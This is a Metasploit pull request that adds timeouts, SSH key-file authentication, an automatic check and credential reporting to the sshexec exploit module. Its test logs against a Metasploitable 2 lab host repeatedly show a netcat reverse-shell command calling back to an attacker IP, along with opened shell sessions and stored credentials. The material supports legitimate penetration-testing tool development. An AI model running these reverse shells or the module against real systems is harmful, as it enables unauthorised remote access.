### PR TITLE
sshexec: Timeout & KEY_FILE support

### DIFF
--- a/modules/exploits/multi/ssh/sshexec.rb
+++ b/modules/exploits/multi/ssh/sshexec.rb
@@ -12,152 +12,165 @@ class MetasploitModule < Msf::Exploit::Remote
 
   attr_accessor :ssh_socket
 
-  def initialize
+  def initialize(info = {})
     super(
-      'Name' => 'SSH User Code Execution',
-      'Description' => %q{
-        This module connects to the target system and executes the necessary
-        commands to run the specified payload via SSH. If a native payload is
-        specified, an appropriate stager will be used.
-      },
-      'Author' => ['Spencer McIntyre', 'Brandon Knight'],
-      'References' => [
-        [ 'CVE', '1999-0502'], # Weak password
-        [ 'ATT&CK', Mitre::Attack::Technique::T1021_004_SSH ]
-      ],
-      'License' => MSF_LICENSE,
-      'Privileged' => true,
-      'DefaultOptions' => {
-        'PrependFork' => 'true',
-        'EXITFUNC' => 'process'
-      },
-      'Payload' => {
-        'Space' => 800000,
-        'BadChars' => '',
-        'DisableNops' => true
-      },
-      'CmdStagerFlavor' => %w[bourne echo printf wget],
-      'Targets' => [
-        [
-          'Linux Command',
-          {
-            'Arch' => ARCH_CMD,
-            'Platform' => 'linux'
-          }
+      update_info(
+        info,
+        'Name' => 'SSH User Code Execution',
+        'Description' => %q{
+          This module connects to the target system and executes the necessary
+          commands to run the specified payload via SSH. If a native payload is
+          specified, an appropriate stager will be used.
+        },
+        'Author' => [
+          'Spencer McIntyre',
+          'Brandon Knight',
+          'g0tmi1k' # @g0tmi1k - additional features
         ],
-        [
-          'Linux x86',
-          {
-            'Arch' => ARCH_X86,
-            'Platform' => 'linux'
-          }
+        'References' => [
+          [ 'CVE', '1999-0502' ], # Weak password
+          [ 'ATT&CK', Mitre::Attack::Technique::T1021_004_SSH ]
         ],
-        [
-          'Linux x64',
-          {
-            'Arch' => ARCH_X64,
-            'Platform' => 'linux'
-          }
-        ],
-        [
-          'Linux armle',
-          {
-            'Arch' => ARCH_ARMLE,
-            'Platform' => 'linux'
-          }
-        ],
-        [
-          'Linux mipsle',
-          {
-            'Arch' => ARCH_MIPSLE,
-            'Platform' => 'linux',
-            'CmdStagerFlavor' => %w[curl wget]
-          }
-        ],
-        [
-          'Linux mipsbe',
-          {
-            'Arch' => ARCH_MIPSBE,
-            'Platform' => 'linux',
-            'CmdStagerFlavor' => %w[wget]
-          }
-        ],
-        [
-          'Linux aarch64',
-          {
-            'Arch' => ARCH_AARCH64,
-            'Platform' => 'linux'
-          }
-        ],
-        [
-          'OSX x86',
-          {
-            'Arch' => ARCH_X86,
-            'Platform' => 'osx',
-            'CmdStagerFlavor' => %w[curl wget]
-          }
-        ],
-        [
-          'OSX x64',
-          {
-            'Arch' => ARCH_X64,
-            'Platform' => 'osx',
-            'CmdStagerFlavor' => %w[curl wget]
-          }
-        ],
-        [
-          'BSD x86',
-          {
-            'Arch' => ARCH_X86,
-            'Platform' => 'bsd',
-            'CmdStagerFlavor' => %w[printf curl wget]
-          }
-        ],
-        [
-          'BSD x64',
-          {
-            'Arch' => ARCH_X64,
-            'Platform' => 'bsd',
-            'CmdStagerFlavor' => %w[printf curl wget]
-          }
-        ],
-        [
-          'Python',
-          {
-            'Arch' => ARCH_PYTHON,
-            'Platform' => 'python'
-          }
-        ],
-        [
-          'Unix Cmd',
-          {
-            'Arch' => ARCH_CMD,
-            'Platform' => 'unix'
-          }
-        ],
-        [
-          'Interactive SSH',
-          {
-            'DefaultOptions' => {
-              'PAYLOAD' => 'generic/ssh/interact',
-              'WfsDelay' => 5
-            },
-            'Payload' => {
-              'Compat' => {
-                'PayloadType' => 'ssh_interact'
+        'License' => MSF_LICENSE,
+        'Privileged' => false,
+        'DefaultOptions' => {
+          'PrependFork' => 'true',
+          'EXITFUNC' => 'process'
+        },
+        'Payload' => {
+          'Space' => 800000,
+          'BadChars' => '',
+          'DisableNops' => true
+        },
+        'CmdStagerFlavor' => %w[bourne echo printf wget],
+        'Targets' => [
+          [
+            'Linux Command',
+            {
+              'Arch' => ARCH_CMD,
+              'Platform' => 'linux',
+              'DefaultOptions' => {
+                'PrependFork' => 'false'
               }
             }
-          }
-        ]
-      ],
-      'DefaultTarget' => 0,
-      # For the CVE
-      'DisclosureDate' => '1999-01-01',
-      'Notes' => {
-        'Stability' => [ CRASH_SAFE, ],
-        'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, ],
-        'Reliability' => [ REPEATABLE_SESSION, ]
-      },
+          ],
+          [
+            'Linux x86',
+            {
+              'Arch' => ARCH_X86,
+              'Platform' => 'linux'
+            }
+          ],
+          [
+            'Linux x64',
+            {
+              'Arch' => ARCH_X64,
+              'Platform' => 'linux'
+            }
+          ],
+          [
+            'Linux armle',
+            {
+              'Arch' => ARCH_ARMLE,
+              'Platform' => 'linux'
+            }
+          ],
+          [
+            'Linux mipsle',
+            {
+              'Arch' => ARCH_MIPSLE,
+              'Platform' => 'linux',
+              'CmdStagerFlavor' => %w[curl wget]
+            }
+          ],
+          [
+            'Linux mipsbe',
+            {
+              'Arch' => ARCH_MIPSBE,
+              'Platform' => 'linux',
+              'CmdStagerFlavor' => %w[wget]
+            }
+          ],
+          [
+            'Linux aarch64',
+            {
+              'Arch' => ARCH_AARCH64,
+              'Platform' => 'linux'
+            }
+          ],
+          [
+            'OSX x86',
+            {
+              'Arch' => ARCH_X86,
+              'Platform' => 'osx',
+              'CmdStagerFlavor' => %w[curl wget]
+            }
+          ],
+          [
+            'OSX x64',
+            {
+              'Arch' => ARCH_X64,
+              'Platform' => 'osx',
+              'CmdStagerFlavor' => %w[curl wget]
+            }
+          ],
+          [
+            'BSD x86',
+            {
+              'Arch' => ARCH_X86,
+              'Platform' => 'bsd',
+              'CmdStagerFlavor' => %w[printf curl wget]
+            }
+          ],
+          [
+            'BSD x64',
+            {
+              'Arch' => ARCH_X64,
+              'Platform' => 'bsd',
+              'CmdStagerFlavor' => %w[printf curl wget]
+            }
+          ],
+          [
+            'Python',
+            {
+              'Arch' => ARCH_PYTHON,
+              'Platform' => 'python'
+            }
+          ],
+          [
+            'Unix Cmd',
+            {
+              'Arch' => ARCH_CMD,
+              'Platform' => 'unix',
+              'DefaultOptions' => {
+                'PrependFork' => 'false'
+              }
+            }
+          ],
+          [
+            'Interactive SSH',
+            {
+              'DefaultOptions' => {
+                'PAYLOAD' => 'generic/ssh/interact',
+                'WfsDelay' => 5
+              },
+              'Payload' => {
+                'Compat' => {
+                  'PayloadType' => 'ssh_interact'
+                }
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        # For the CVE
+        'DisclosureDate' => '1999-01-01',
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
+          'Reliability' => [ REPEATABLE_SESSION ]
+        }
+      )
     )
 
     register_options(

--- a/modules/exploits/multi/ssh/sshexec.rb
+++ b/modules/exploits/multi/ssh/sshexec.rb
@@ -161,8 +161,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
     register_options(
       [
-        OptString.new('USERNAME', [ true, 'The user to authenticate as.', 'root' ]),
-        OptString.new('PASSWORD', [ true, 'The password to authenticate with.', '' ]),
+        OptString.new('USERNAME', [ true, 'The user to authenticate as' ]),
+        OptString.new('PASSWORD', [ false, 'The password to authenticate with' ]),
         Opt::RHOST(),
         Opt::RPORT(22)
       ]

--- a/modules/exploits/multi/ssh/sshexec.rb
+++ b/modules/exploits/multi/ssh/sshexec.rb
@@ -211,7 +211,11 @@ class MetasploitModule < Msf::Exploit::Remote
     opt_hash[:verbose] = :debug if datastore['SSH_DEBUG']
 
     begin
-      self.ssh_socket = Net::SSH.start(ip, user, opt_hash)
+      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
+        self.ssh_socket = Net::SSH.start(ip, user, opt_hash)
+      end
+    rescue ::Timeout::Error
+      fail_with(Failure::Unreachable, 'Timed out during negotiation')
     rescue Rex::ConnectionError
       fail_with(Failure::Unreachable, 'Disconnected during negotiation')
     rescue Net::SSH::Disconnect, ::EOFError

--- a/modules/exploits/multi/ssh/sshexec.rb
+++ b/modules/exploits/multi/ssh/sshexec.rb
@@ -164,6 +164,8 @@ class MetasploitModule < Msf::Exploit::Remote
       [
         OptString.new('USERNAME', [ true, 'The user to authenticate as' ]),
         OptString.new('PASSWORD', [ false, 'The password to authenticate with' ]),
+        OptPath.new('KEY_FILE', [ false, 'Path to an SSH private key file' ]),
+        OptString.new('KEY_PASS', [ false, 'Passphrase for the SSH private key' ]),
         Opt::RHOST(),
         Opt::RPORT(22)
       ]
@@ -189,11 +191,22 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def do_login(ip, user, pass, port)
-    opt_hash = ssh_client_defaults.merge({
-      auth_methods: ['password', 'keyboard-interactive'],
-      port: port,
-      password: pass
-    })
+    opt_hash = ssh_client_defaults.merge({ port: port })
+
+    if datastore['KEY_FILE'].present?
+      begin
+        key_data = File.read(datastore['KEY_FILE'])
+      rescue Errno::ENOENT, Errno::EACCES => e
+        fail_with(Failure::BadConfig, "Cannot read KEY_FILE: #{e.message}")
+      end
+
+      opt_hash[:auth_methods] = ['publickey']
+      opt_hash[:key_data] = [key_data]
+      opt_hash[:passphrase] = datastore['KEY_PASS'] if datastore['KEY_PASS'].present?
+    else
+      opt_hash[:auth_methods] = ['password', 'keyboard-interactive']
+      opt_hash[:password] = pass
+    end
 
     opt_hash[:verbose] = :debug if datastore['SSH_DEBUG']
 

--- a/modules/exploits/multi/ssh/sshexec.rb
+++ b/modules/exploits/multi/ssh/sshexec.rb
@@ -175,12 +175,14 @@ class MetasploitModule < Msf::Exploit::Remote
     )
   end
 
-  def execute_command(cmd, _opts = {})
+  def execute_command(cmd, opts = {})
     vprint_status("Executing #{cmd}")
+
     begin
       Timeout.timeout(3.5) { ssh_socket.exec!(cmd) }
     rescue Timeout::Error
-      print_warning('Timed out while waiting for command to return')
+      # Blocking payloads (eg. reverse without PrependFork) never return, thus will timeout - expected!
+      vprint_warning('Timed out waiting for command to return') unless opts[:silent_timeout]
       @timeout = true
     end
   end
@@ -219,7 +221,7 @@ class MetasploitModule < Msf::Exploit::Remote
     python_binary ||= binary_exists('python2', platform: 'unix')
     fail_with(Failure::NoTarget, 'Python was not found on the target system') if python_binary.nil?
 
-    execute_command("echo \"#{payload.encoded}\" | #{python_binary}")
+    execute_command("echo \"#{payload.encoded}\" | #{python_binary}", silent_timeout: true)
   end
 
   def exploit
@@ -236,10 +238,10 @@ class MetasploitModule < Msf::Exploit::Remote
     when 'python'
       execute_python
     when 'unix'
-      execute_command(payload.encoded)
+      execute_command(payload.encoded, silent_timeout: true)
     else
       if target['Arch'] == ARCH_CMD
-        execute_command(payload.encoded)
+        execute_command(payload.encoded, silent_timeout: true)
       else
         execute_cmdstager(linemax: 500)
       end

--- a/modules/exploits/multi/ssh/sshexec.rb
+++ b/modules/exploits/multi/ssh/sshexec.rb
@@ -173,7 +173,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
     register_advanced_options(
       [
-        OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false])
+        OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
+        OptInt.new('SSH_EXEC_TIMEOUT', [ false, 'Timeout (seconds) for each remote command execution', 4])
       ]
     )
   end
@@ -182,7 +183,7 @@ class MetasploitModule < Msf::Exploit::Remote
     vprint_status("Executing #{cmd}")
 
     begin
-      Timeout.timeout(3.5) { ssh_socket.exec!(cmd) }
+      Timeout.timeout(datastore['SSH_EXEC_TIMEOUT']) { ssh_socket.exec!(cmd) }
     rescue Timeout::Error
       # Blocking payloads (eg. reverse without PrependFork) never return, thus will timeout - expected!
       vprint_warning('Timed out waiting for command to return') unless opts[:silent_timeout]

--- a/modules/exploits/multi/ssh/sshexec.rb
+++ b/modules/exploits/multi/ssh/sshexec.rb
@@ -8,6 +8,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   include Msf::Exploit::CmdStager
   include Msf::Exploit::Remote::SSH
+  prepend Msf::Exploit::Remote::AutoCheck
 
   attr_accessor :ssh_socket
 
@@ -222,6 +223,21 @@ class MetasploitModule < Msf::Exploit::Remote
     fail_with(Failure::NoTarget, 'Python was not found on the target system') if python_binary.nil?
 
     execute_command("echo \"#{payload.encoded}\" | #{python_binary}", silent_timeout: true)
+  end
+
+  def check
+    do_login(datastore['RHOST'], datastore['USERNAME'], datastore['PASSWORD'], datastore['RPORT'])
+    ssh_socket&.close
+
+    CheckCode::Appears('Credentials accepted')
+  rescue Msf::Exploit::Failed
+    case fail_reason
+    when Failure::Unreachable, Failure::Disconnected
+      report_host(host: datastore['RHOST'])
+      CheckCode::Unknown('Could not connect to SSH service')
+    else
+      CheckCode::Safe('Authentication failed - credentials may be incorrect')
+    end
   end
 
   def exploit

--- a/modules/exploits/multi/ssh/sshexec.rb
+++ b/modules/exploits/multi/ssh/sshexec.rb
@@ -180,7 +180,11 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def execute_command(cmd, opts = {})
-    vprint_status("Executing #{cmd}")
+    if cmd.valid_encoding?
+      vprint_status("Executing: #{cmd}")
+    else
+      vprint_status('Executing binary command')
+    end
 
     begin
       Timeout.timeout(datastore['SSH_EXEC_TIMEOUT']) { ssh_socket.exec!(cmd) }

--- a/modules/exploits/multi/ssh/sshexec.rb
+++ b/modules/exploits/multi/ssh/sshexec.rb
@@ -244,22 +244,48 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
+    banner = grab_ssh_banner(datastore['RHOST'], datastore['RPORT'])
     do_login(datastore['RHOST'], datastore['USERNAME'], datastore['PASSWORD'], datastore['RPORT'])
     ssh_socket&.close
 
     CheckCode::Appears('Credentials accepted')
   rescue Msf::Exploit::Failed
+    report_ssh_service(datastore['RHOST'], datastore['RPORT'], info: banner) if banner
+
     case fail_reason
     when Failure::Unreachable, Failure::Disconnected
-      report_host(host: datastore['RHOST'])
+      report_host(host: datastore['RHOST']) unless banner
       CheckCode::Unknown('Could not connect to SSH service')
     else
       CheckCode::Safe('Authentication failed - credentials may be incorrect')
     end
   end
 
+  def report_ssh_proof
+    banner = ssh_socket.transport.server_version.version.to_s.strip
+
+    report_ssh_host(banner, datastore['RHOST'], datastore['RPORT'])
+    report_ssh_hostkeys(ssh_socket.transport, datastore['RHOST'], datastore['RPORT'])
+    report_ssh_service(datastore['RHOST'], datastore['RPORT'], info: banner)
+
+    store_valid_credential(
+      user: datastore['USERNAME'],
+      private: datastore['KEY_FILE'].present? ? File.read(datastore['KEY_FILE']) : datastore['PASSWORD'],
+      private_type: datastore['KEY_FILE'].present? ? :ssh_key : :password,
+      proof: banner,
+      service_data: {
+        address: datastore['RHOST'],
+        port: datastore['RPORT'],
+        service_name: 'ssh',
+        protocol: 'tcp',
+        origin_type: :service
+      }
+    )
+  end
+
   def exploit
     do_login(datastore['RHOST'], datastore['USERNAME'], datastore['PASSWORD'], datastore['RPORT'])
+    report_ssh_proof
 
     if target.name == 'Interactive SSH'
       handler(ssh_socket)


### PR DESCRIPTION
This PR covers:

- Use SSH mixin
- Add check()
- Add SSH_EXEC_TIMEOUT option & re-enable SSH_TIMEOUT support
- Add KEY_FILE (and supports password protected)
- Improve payload support
- Update module metadata

Target is Metasploitable 2.

```
        current  name     hosts  services  vulns  creds  loots  notes
        -------  ----     -----  --------  -----  -----  -----  -----
Before: *        default  1      0         1      0      0      0
After : *        default  1      2         1      2      0      2
```

## Setup

SSh keys has been pre-created & installed on the target ahead of time (came from doing another PR!)

## Before

- All testing was done using master branch
- During targeting the wrong port, 21/TCP (aka FTP), had to manually kill the attack (CTRL+C) - wouldn't time out
- Workspace only would get updated if successful result
  - Service wasn't updated, nor was creds (even if successful)
- Various "nags" with the payload choose  

```console
$ ./msfconsole -q -x 'db_status; workspace -D; setg VERBOSE true;
setg PAYLOAD cmd/unix/reverse_netcat; set LHOST tap0;
use exploit/multi/ssh/sshexec;
set RHOSTS 10.0.0.10;
set target "Unix Cmd";
options'
[*] Connected to msf. Connection type: postgresql.
[*] Deleted workspace: default
[*] Recreated the default workspace
VERBOSE => true
PAYLOAD => cmd/unix/reverse_netcat
LHOST => tap0
[*] Using configured payload cmd/unix/reverse_netcat
RHOSTS => 10.0.0.10
target => Unix Cmd

Module options (exploit/multi/ssh/sshexec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   yes       The password to authenticate with.
   RHOSTS    10.0.0.10        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT     22               yes       The target port (TCP)
   SRVHOST                    no        The local host to listen on and use for incoming connections
   SRVSSL    false            no        Negotiate SSL/TLS for local server connections
   SSL       false            no        Negotiate SSL for incoming connections
   SSLCert                    no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                    no        The URI to use for this exploit (default is random)
   USERNAME  root             yes       The user to authenticate as.


   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVPORT  8080             yes       The local port to listen on


Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  tap0             yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   12  Unix Cmd



View the full module info with the info, or info -d command.

msf exploit(multi/ssh/sshexec) >
```

```console
msf exploit(multi/ssh/sshexec) > run RPORT=9999
[+] mkfifo /tmp/hktww; nc 10.0.0.1 4444 0</tmp/hktww | /bin/sh >/tmp/hktww 2>&1; rm /tmp/hktww
[*] Started reverse TCP handler on 10.0.0.1:4444
[-] Exploit aborted due to failure: unreachable: Disconnected during negotiation
[*] Exploit completed, but no session was created.
msf exploit(multi/ssh/sshexec) > workspace -v

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
*        default  0      0         0      0      0      0

msf exploit(multi/ssh/sshexec) >
```

```console
msf exploit(multi/ssh/sshexec) > run RPORT=21
[+] mkfifo /tmp/cnzilef; nc 10.0.0.1 4444 0</tmp/cnzilef | /bin/sh >/tmp/cnzilef 2>&1; rm /tmp/cnzilef
[*] Started reverse TCP handler on 10.0.0.1:4444
^C[-] Exploit failed [user-interrupt]: Interrupt
[-] run: Interrupted
msf exploit(multi/ssh/sshexec) > workspace -v

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
*        default  0      0         0      0      0      0

msf exploit(multi/ssh/sshexec) >
```

```console
msf exploit(multi/ssh/sshexec) > run
[+] mkfifo /tmp/njfopwh; nc 10.0.0.1 4444 0</tmp/njfopwh | /bin/sh >/tmp/njfopwh 2>&1; rm /tmp/njfopwh
[*] Started reverse TCP handler on 10.0.0.1:4444
[-] Exploit aborted due to failure: no-access: Failed authentication
[*] Exploit completed, but no session was created.
msf exploit(multi/ssh/sshexec) >
msf exploit(multi/ssh/sshexec) > run USERNAME=msfadmin PASSWORD=msfadmin
[+] mkfifo /tmp/cbeeb; nc 10.0.0.1 4444 0</tmp/cbeeb | /bin/sh >/tmp/cbeeb 2>&1; rm /tmp/cbeeb
[*] Started reverse TCP handler on 10.0.0.1:4444
[*] 10.0.0.10:22 - Sending stager...
[*] Executing mkfifo /tmp/iufubm; nc 10.0.0.1 4444 0</tmp/iufubm | /bin/sh >/tmp/iufubm 2>&1; rm /tmp/iufubm
[!] Timed out while waiting for command to return
[*] Command shell session 1 opened (10.0.0.1:4444 -> 10.0.0.10:52384) at 2026-05-26 23:18:06 +0100

id
uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin)
^Z
Background session 1? [y/N]  y
msf exploit(multi/ssh/sshexec) > workspace -v

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
*        default  1      0         1      0      0      0

msf exploit(multi/ssh/sshexec) > hosts

Hosts
=====

address    mac  name  os_name  os_flavor  os_sp  purpose  info  comments
-------    ---  ----  -------  ---------  -----  -------  ----  --------
10.0.0.10

msf exploit(multi/ssh/sshexec) > vulns

Vulnerabilities
===============

Timestamp                Host       Service  Resource  Name                     References
---------                ----       -------  --------  ----                     ----------
2026-05-26 22:18:05 UTC  10.0.0.10  None     {}        SSH User Code Execution  CVE-1999-0502,ATT&CK-T1021.004

msf exploit(multi/ssh/sshexec) >
```



## After

- All testing was done on this branch, with SSH mixin (https://github.com/rapid7/metasploit-framework/pull/21479) and auth_brute_mixin applied (https://github.com/rapid7/metasploit-framework/pull/21396)
- Scanning a valid host, but closed port: 1 host
- Scanning a valid host, open port, but incorrect: 1 host, 1 service
- Scanning a valid host, and valid SSH service: 1 host, 2 services
- Scanning a valid host, and valid SSH service with valid creds: Even more on the workspace ;)
- Happier with the payload being used.

```console
$ ./msfconsole -q -x 'db_status; workspace -D; setg VERBOSE true;
setg PAYLOAD cmd/unix/reverse_netcat; set LHOST tap0;
use exploit/multi/ssh/sshexec;
set RHOSTS 10.0.0.10;
set target "Unix Cmd";
options'
[*] Connected to msf. Connection type: postgresql.
[*] Deleted workspace: default
[*] Recreated the default workspace
VERBOSE => true
PAYLOAD => cmd/unix/reverse_netcat
LHOST => tap0
[*] Using configured payload cmd/unix/reverse_netcat
RHOSTS => 10.0.0.10
target => Unix Cmd

Module options (exploit/multi/ssh/sshexec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   KEY_FILE                   no        Path to an SSH private key file
   KEY_PASS                   no        Passphrase for the SSH private key
   PASSWORD                   no        The password to authenticate with
   RHOSTS    10.0.0.10        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT     22               yes       The target port (TCP)
   SRVHOST                    no        The local host to listen on and use for incoming connections
   SRVSSL    false            no        Negotiate SSL/TLS for local server connections
   SSL       false            no        Negotiate SSL for incoming connections
   SSLCert                    no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                    no        The URI to use for this exploit (default is random)
   USERNAME                   yes       The user to authenticate as


   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVPORT  8080             yes       The local port to listen on


Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  tap0             yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   12  Unix Cmd



View the full module info with the info, or info -d command.

msf exploit(multi/ssh/sshexec) >
```

```console
msf exploit(multi/ssh/sshexec) > run RPORT=9999 USERNAME=msfadmin
[+] mkfifo /tmp/xmidoo; nc 10.0.0.1 4444 0</tmp/xmidoo | /bin/sh >/tmp/xmidoo 2>&1; rm /tmp/xmidoo
[*] Started reverse TCP handler on 10.0.0.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[-] Exploit aborted due to failure: unknown: Cannot reliably check exploitability. Could not connect to SSH service "set ForceExploit true" to override check result.
[*] Exploit completed, but no session was created.
msf exploit(multi/ssh/sshexec) > workspace -v

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
*        default  1      0         0      0      0      0

msf exploit(multi/ssh/sshexec) >
```


```console
msf exploit(multi/ssh/sshexec) > workspace -D
[*] Deleted workspace: default
[*] Recreated the default workspace
msf exploit(multi/ssh/sshexec) > run RPORT=21 USERNAME=msfadmin
[+] mkfifo /tmp/nrmoxao; nc 10.0.0.1 4444 0</tmp/nrmoxao | /bin/sh >/tmp/nrmoxao 2>&1; rm /tmp/nrmoxao
[*] Started reverse TCP handler on 10.0.0.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[-] Exploit aborted due to failure: unknown: Cannot reliably check exploitability. Could not connect to SSH service "set ForceExploit true" to override check result.
[*] Exploit completed, but no session was created.
msf exploit(multi/ssh/sshexec) >
```


```console
msf exploit(multi/ssh/sshexec) > workspace -D
[*] Deleted workspace: default
[*] Recreated the default workspace
msf exploit(multi/ssh/sshexec) > run USERNAME=msfadmin
[+] mkfifo /tmp/kdehpix; nc 10.0.0.1 4444 0</tmp/kdehpix | /bin/sh >/tmp/kdehpix 2>&1; rm /tmp/kdehpix
[*] Started reverse TCP handler on 10.0.0.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[-] Exploit aborted due to failure: not-vulnerable: The target is not exploitable. Authentication failed - credentials may be incorrect "set ForceExploit true" to override check result.
[*] Exploit completed, but no session was created.
msf exploit(multi/ssh/sshexec) > workspace -v

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
*        default  1      2         0      0      0      0

msf exploit(multi/ssh/sshexec) >
msf exploit(multi/ssh/sshexec) >
msf exploit(multi/ssh/sshexec) > run USERNAME=msfadmin PASSWORD=msfadmin
[+] mkfifo /tmp/zrfooqg; nc 10.0.0.1 4444 0</tmp/zrfooqg | /bin/sh >/tmp/zrfooqg 2>&1; rm /tmp/zrfooqg
[*] Started reverse TCP handler on 10.0.0.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Credentials accepted
[*] 10.0.0.10:22 - Sending stager...
[*] Executing: mkfifo /tmp/lkeekn; nc 10.0.0.1 4444 0</tmp/lkeekn | /bin/sh >/tmp/lkeekn 2>&1; rm /tmp/lkeekn
[*] Command shell session 1 opened (10.0.0.1:4444 -> 10.0.0.10:57105) at 2026-05-26 23:43:31 +0100

id
uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin)
^Z
Background session 1? [y/N]  y
msf exploit(multi/ssh/sshexec) > workspace -v

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
*        default  1      2         1      1      0      2

msf exploit(multi/ssh/sshexec) > hosts

Hosts
=====

address    mac  name  os_name  os_flavor  os_sp  purpose  info  comments
-------    ---  ----  -------  ---------  -----  -------  ----  --------
10.0.0.10             Linux    Ubuntu     8.04   server

msf exploit(multi/ssh/sshexec) > services
Services
========

host       port  proto  name  state  info                                   resource  parents
----       ----  -----  ----  -----  ----                                   --------  -------
10.0.0.10  22    tcp    ssh   open   SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1  {}        tcp (22/tcp)
10.0.0.10  22    tcp    tcp   open                                          {}

msf exploit(multi/ssh/sshexec) > vulns

Vulnerabilities
===============

Timestamp                Host       Service       Resource  Name                       References
---------                ----       -------       --------  ----                       ----------
2026-05-26 22:43:24 UTC  10.0.0.10  ssh (22/tcp)  {}        exploit/multi/ssh/sshexec  CVE-1999-0502,ATT&CK-T1021.004

msf exploit(multi/ssh/sshexec) > creds
Credentials
===========

id   host       origin     service       public    private   realm  private_type  JtR Format  cracked_password
--   ----       ------     -------       ------    -------   -----  ------------  ----------  ----------------
585  10.0.0.10  10.0.0.10  22/tcp (ssh)  msfadmin  msfadmin         Password

msf exploit(multi/ssh/sshexec) > notes

Notes
=====

 Time                     Host       Service  Port  Protocol  Type         Data
 ----                     ----       -------  ----  --------  ----         ----
 2026-05-26 22:43:24 UTC  10.0.0.10  ssh      22    tcp       ssh.cpe      {:cpe=>"cpe:/o:canonical:ubuntu_linux:8.04"}
 2026-05-26 22:43:24 UTC  10.0.0.10  ssh      22    tcp       ssh.hostkey  {:type=>"ssh-rsa", :fingerprint=>"SHA256:BQHm5EoHX9GCiOLuVscegPXLQOsuPs+E9d/rrJB84rk"}

msf exploit(multi/ssh/sshexec) >
```


```console
msf exploit(multi/ssh/sshexec) > run KEY_FILE=/tmp/testkeys/rsa_2048_legacy_2
[-] Msf::OptionValidateError One or more options failed to validate: USERNAME.
msf exploit(multi/ssh/sshexec) >
msf exploit(multi/ssh/sshexec) >
msf exploit(multi/ssh/sshexec) > run KEY_FILE=/tmp/testkeys/rsa_2048_legacy_2 USERNAME=msfadmin
[+] mkfifo /tmp/dnhjnaa; nc 10.0.0.1 4444 0</tmp/dnhjnaa | /bin/sh >/tmp/dnhjnaa 2>&1; rm /tmp/dnhjnaa
[*] Started reverse TCP handler on 10.0.0.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Credentials accepted
[*] 10.0.0.10:22 - Sending stager...
[*] Executing: mkfifo /tmp/biktw; nc 10.0.0.1 4444 0</tmp/biktw | /bin/sh >/tmp/biktw 2>&1; rm /tmp/biktw
[*] Command shell session 2 opened (10.0.0.1:4444 -> 10.0.0.10:49998) at 2026-05-26 23:46:36 +0100

id
uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin)
^Z
Background session 2? [y/N]  y
msf exploit(multi/ssh/sshexec) > workspace -v

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
*        default  1      2         1      2      0      2

msf exploit(multi/ssh/sshexec) > c
[-] Unknown command: c. Did you mean cd? Run the help command for more details.
msf exploit(multi/ssh/sshexec) > creds
Credentials
===========

id   host       origin     service       public    private                                          realm  private_type  JtR Format  cracked_password
